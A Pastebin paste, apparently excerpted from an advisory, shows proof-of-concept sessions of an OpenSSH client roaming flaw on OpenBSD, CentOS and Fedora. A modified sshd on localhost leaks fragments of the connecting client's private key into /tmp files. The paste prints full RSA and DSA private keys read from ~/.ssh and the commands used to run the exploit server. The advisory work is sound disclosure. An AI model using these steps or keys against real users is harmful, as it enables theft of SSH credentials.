Advertisement
Guest User

Untitled

a guest
Feb 16th, 2019
204
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $ head -n 1 /etc/motd
  2. OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
  3.  
  4. $ /usr/bin/ssh -V
  5. OpenSSH_7.0, LibreSSL 2.2.2
  6.  
  7. $ cat ~/.ssh/id_rsa
  8. -----BEGIN RSA PRIVATE KEY-----
  9. MIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL
  10. ruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s
  11. 17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8
  12. L/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh
  13. xSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP
  14. vavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl
  15. Jka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP
  16. Kyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19
  17. qJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY
  18. gQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK
  19. QolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt
  20. gKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL
  21. cQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB
  22. +s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl
  23. hcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri
  24. hBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh
  25. vhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O
  26. nFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG
  27. 8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra
  28. uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc
  29. prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO
  30. ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V
  31. 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp
  32. ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz
  33. uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
  34. -----END RSA PRIVATE KEY-----
  35.  
  36. # "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
  37.  
  38. $ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 1 %h %p" -p 222 127.0.0.1
  39. [connection suspended, press return to resume]Segmentation fault (core dumped)
  40.  
  41. (this example requires a ProxyCommand because of the NULL-aitop bug
  42. described in the Mitigating Factors of the Information Leak section, and
  43. crashes because of the NULL-pointer dereference discussed in the
  44. Mitigating Factors of the Buffer Overflow section)
  45.  
  46. # cat /tmp/roaming-a5eca355/infoleak
  47. ry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra
  48. uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc
  49. prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO
  50. ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V
  51. 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp
  52. ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz
  53. uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
  54.  
  55. ------------------------------------------------------------------------
  56. Private Key Disclosure example: CentOS 7, 1024-bit DSA key
  57. ------------------------------------------------------------------------
  58.  
  59. $ grep PRETTY_NAME= /etc/os-release
  60. PRETTY_NAME="CentOS Linux 7 (Core)"
  61.  
  62. $ /usr/bin/ssh -V
  63. OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
  64.  
  65. $ cat ~/.ssh/id_dsa
  66. -----BEGIN DSA PRIVATE KEY-----
  67. MIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe
  68. kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n
  69. GLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a
  70. Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC
  71. o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2
  72. hUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X
  73. iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l
  74. B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
  75. QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS
  76. F9AoVoZFKEGn4FEoYIqY3a4=
  77. -----END DSA PRIVATE KEY-----
  78.  
  79. # env ROAMING="heap_massaging:linux" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
  80.  
  81. $ /usr/bin/ssh -p 222 127.0.0.1
  82. ...
  83.  
  84. # strings /tmp/roaming-b7b16dfc/infoleak
  85. jJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe
  86. kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5
  87.  
  88. # strings /tmp/roaming-b324ce87/infoleak
  89. IuQL
  90. R2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a
  91. Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC
  92. o7l7mJT+lI9v
  93.  
  94. # strings /tmp/roaming-24011739/infoleak
  95. KjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC
  96. o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC
  97.  
  98. # strings /tmp/roaming-37456846/infoleak
  99. LsBlstpuQ4Hr2DHmalL8X
  100. iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l
  101. B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA
  102. yq4Kwj/
  103.  
  104. # strings /tmp/roaming-988ff54c/infoleak
  105. GBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l
  106. B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
  107.  
  108. # strings /tmp/roaming-53887fa5/infoleak
  109. /4oatxFUV5V8aniqyq4Kwj/
  110. QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS
  111. F9AoVoZFKEGn4FEoYIqY3a4
  112.  
  113. ------------------------------------------------------------------------
  114. Private Key Disclosure example: Fedora 20, 2048-bit RSA key
  115. ------------------------------------------------------------------------
  116.  
  117. $ grep PRETTY_NAME= /etc/os-release
  118. PRETTY_NAME="Fedora 20 (Heisenbug)"
  119.  
  120. $ /usr/bin/ssh -V
  121. OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
  122.  
  123. $ cat ~/.ssh/id_rsa
  124. -----BEGIN RSA PRIVATE KEY-----
  125. MIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz
  126. HLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp
  127. o9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ
  128. /B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy
  129. 2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK
  130. cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt
  131. j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o
  132. 6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06
  133. Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV
  134. JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr
  135. Hiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l
  136. PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
  137. rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo
  138. /euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot
  139. gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
  140. jwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY
  141. vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y
  142. 3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF
  143. Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P
  144. pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU
  145. dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm
  146. qK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5
  147. r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp
  148. P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+
  149. ZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=
  150. -----END RSA PRIVATE KEY-----
  151.  
  152. # env ROAMING="heap_massaging:linux" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
  153.  
  154. $ /usr/bin/ssh -p 222 127.0.0.1
  155. ...
  156.  
  157. # strings /tmp/roaming-a2bbc5f6/infoleak
  158. cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt
  159. j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG
  160.  
  161. # strings /tmp/roaming-47b46456/infoleak
  162. RGAcE0nc
  163. GCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt
  164. j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o
  165. 6GEmk/oB9
  166.  
  167. # strings /tmp/roaming-7a6717ae/infoleak
  168. cawMW4LZ1
  169. Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV
  170. JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p
  171.  
  172. # strings /tmp/roaming-f3091f08/infoleak
  173. lZ3w0qHe
  174. nSolsDs2k8wHbVP4VtLE8l
  175. PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
  176.  
  177. # strings /tmp/roaming-62a9e9a3/infoleak
  178. lZ3w0qHe
  179. r3TwTa0pPEk11
  180. LbcsTEJ
  181. rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo
  182. /euhzdYixxIkfqyopnYFoER26u37/OHe37P
  183.  
  184. # strings /tmp/roaming-8de31ed5/infoleak
  185. 7qyvNznQ
  186. 26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot
  187. gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
  188.  
  189. # strings /tmp/roaming-f5e0fbcc/infoleak
  190. yESI62wOuaY
  191. vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y
  192. 3fBC3h9BN5banCw6VKfnvm8/q+bwSxS
  193.  
  194. # strings /tmp/roaming-9be933df/infoleak
  195. QRtzK/GpRuMC1
  196. C3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF
  197. Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT
  198.  
  199. # strings /tmp/roaming-ee4d1e6c/infoleak
  200. SG3aTqYp
  201. tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P
  202. pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s
  203.  
  204. # strings /tmp/roaming-c2bfd69c/infoleak
  205. SG3aTqYp
  206. 6JmTOun5zVV6A
  207. H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU
  208. dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s
  209.  
  210. # strings /tmp/roaming-2b3217a1/infoleak
  211. DGLfFGdO
  212. r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp
  213. P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ
  214.  
  215. # strings /tmp/roaming-1e275747/infoleak
  216. g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement